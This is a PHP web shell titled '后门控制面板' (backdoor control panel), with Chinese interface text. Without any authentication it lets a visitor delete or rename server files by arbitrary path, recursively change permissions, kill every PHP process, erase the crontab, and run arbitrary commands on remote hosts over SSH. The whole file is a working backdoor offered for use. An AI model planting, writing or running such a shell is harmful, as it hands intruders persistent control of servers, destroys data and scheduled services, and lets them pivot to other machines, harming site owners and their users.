<?php
// 文件操作处理
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['file_action'])) {
        $target = $_POST['target'] ?? '';
        $action_message = '';

        switch ($_POST['file_action']) {
            case 'delete_file':
                if (is_file($target)) {
                    unlink($target);
                    $action_message = "文件已删除: $target";
                }
                break;
            case 'rename_file':
                $new_name = $_POST['new_name'] ?? '';
                if ($new_name && file_exists($target)) {
                    rename($target, dirname($target) . DIRECTORY_SEPARATOR . $new_name);
                    $action_message = "文件已重命名为: $new_name";
                }
                break;
            case 'chmod_fix':
                chmod_recursive(__DIR__);
                $action_message = "✅ 权限已成功修改：当前目录及所有子目录设为 755，文件设为 644。";
                break;
        }
    }

    // SSH 功能处理
    if (isset($_POST['ssh_execute'])) {
        $host = $_POST['ssh_host'];
        $port = (int)$_POST['ssh_port'];
        $user = $_POST['ssh_user'];
        $pass = $_POST['ssh_pass'];
        $cmd  = $_POST['ssh_cmd'];

        if (!function_exists('ssh2_connect')) {
            $ssh_output = "❌ PHP 未启用 SSH2 扩展，请安装并启用 ssh2。";
        } else {
            $connection = @ssh2_connect($host, $port);
            if (!$connection) {
                $ssh_output = "❌ 无法连接到 $host:$port";
            } elseif (!@ssh2_auth_password($connection, $user, $pass)) {
                $ssh_output = "❌ SSH 身份验证失败";
            } else {
                $stream = ssh2_exec($connection, $cmd);
                stream_set_blocking($stream, true);
                $ssh_output = stream_get_contents($stream);
            }
        }
    }
}

// 列出目录内容
function listFiles($dir) {
    $items = scandir($dir);
    echo "<h2>文件列表（当前目录：$dir）</h2>";
    echo "<ul>";
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $fullpath = $dir . DIRECTORY_SEPARATOR . $item;
        echo "<li>$item ";
        if (is_file($fullpath)) {
            echo "<form style='display:inline;' method='POST'>
                    <input type='hidden' name='target' value='$fullpath'>
                    <button name='file_action' value='delete_file'>删除</button>
                  </form>";
            echo "<form style='display:inline;' method='POST'>
                    <input type='hidden' name='target' value='$fullpath'>
                    重命名: <input name='new_name' value='$item'>
                    <button name='file_action' value='rename_file'>提交</button>
                  </form>";
        }
        echo "</li>";
    }
    echo "</ul>";
}

// 显示 PHP 进程
function listPhpProcesses() {
    echo "<h2>PHP 进程</h2><pre>";
    $output = shell_exec("ps aux | grep php");
    echo htmlspecialchars($output) . "</pre>";
}

// 杀死 PHP 进程
function killPhpProcesses() {
    shell_exec("pkill -f php");
}

// 清空计划任务
function clearCronJobs() {
    shell_exec("crontab -r");
}

// 递归修改权限
function chmod_recursive($path, $dirPerm = 0755, $filePerm = 0644) {
    if (!file_exists($path)) return;
    if (is_dir($path)) {
        chmod($path, $dirPerm);
        foreach (scandir($path) as $item) {
            if ($item === '.' || $item === '..') continue;
            chmod_recursive($path . DIRECTORY_SEPARATOR . $item, $dirPerm, $filePerm);
        }
    } else {
        chmod($path, $filePerm);
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>后门控制面板</title>
</head>
<body>
    <h1>🛠️ 后门控制面板</h1>

    <?php if (!empty($action_message)) echo "<p style='color:green;'>$action_message</p>"; ?>

    <form method="POST">
        <button name="file_action" value="chmod_fix">修复权限 (目录755/文件644)</button>
    </form>

    <form method="POST">
        <button name="process_action" value="kill_php">杀死所有 PHP 进程</button>
        <button name="cron_action" value="clear_cron">清空计划任务</button>
    </form>

    <hr>
    <?php
    if (isset($_POST['process_action']) && $_POST['process_action'] === 'kill_php') {
        killPhpProcesses();
        echo "<p>✅ 所有 PHP 进程已被终止。</p>";
    }

    if (isset($_POST['cron_action']) && $_POST['cron_action'] === 'clear_cron') {
        clearCronJobs();
        echo "<p>✅ 所有计划任务已清空。</p>";
    }

    listFiles(__DIR__);
    listPhpProcesses();
    ?>

    <hr>
    <h2>SSH 远程命令执行</h2>
    <form method="POST">
        主机: <input type="text" name="ssh_host" required>
        端口: <input type="text" name="ssh_port" value="22" required>
        用户: <input type="text" name="ssh_user" required>
        密码: <input type="password" name="ssh_pass" required><br><br>
        命令: <input type="text" name="ssh_cmd" required style="width:400px;">
        <button type="submit" name="ssh_execute" value="1">执行 SSH 命令</button>
    </form>
    <?php
    if (isset($ssh_output)) {
        echo "<h3>SSH 输出：</h3><pre>" . htmlspecialchars($ssh_output) . "</pre>";
    }
    ?>
</body>
</html>
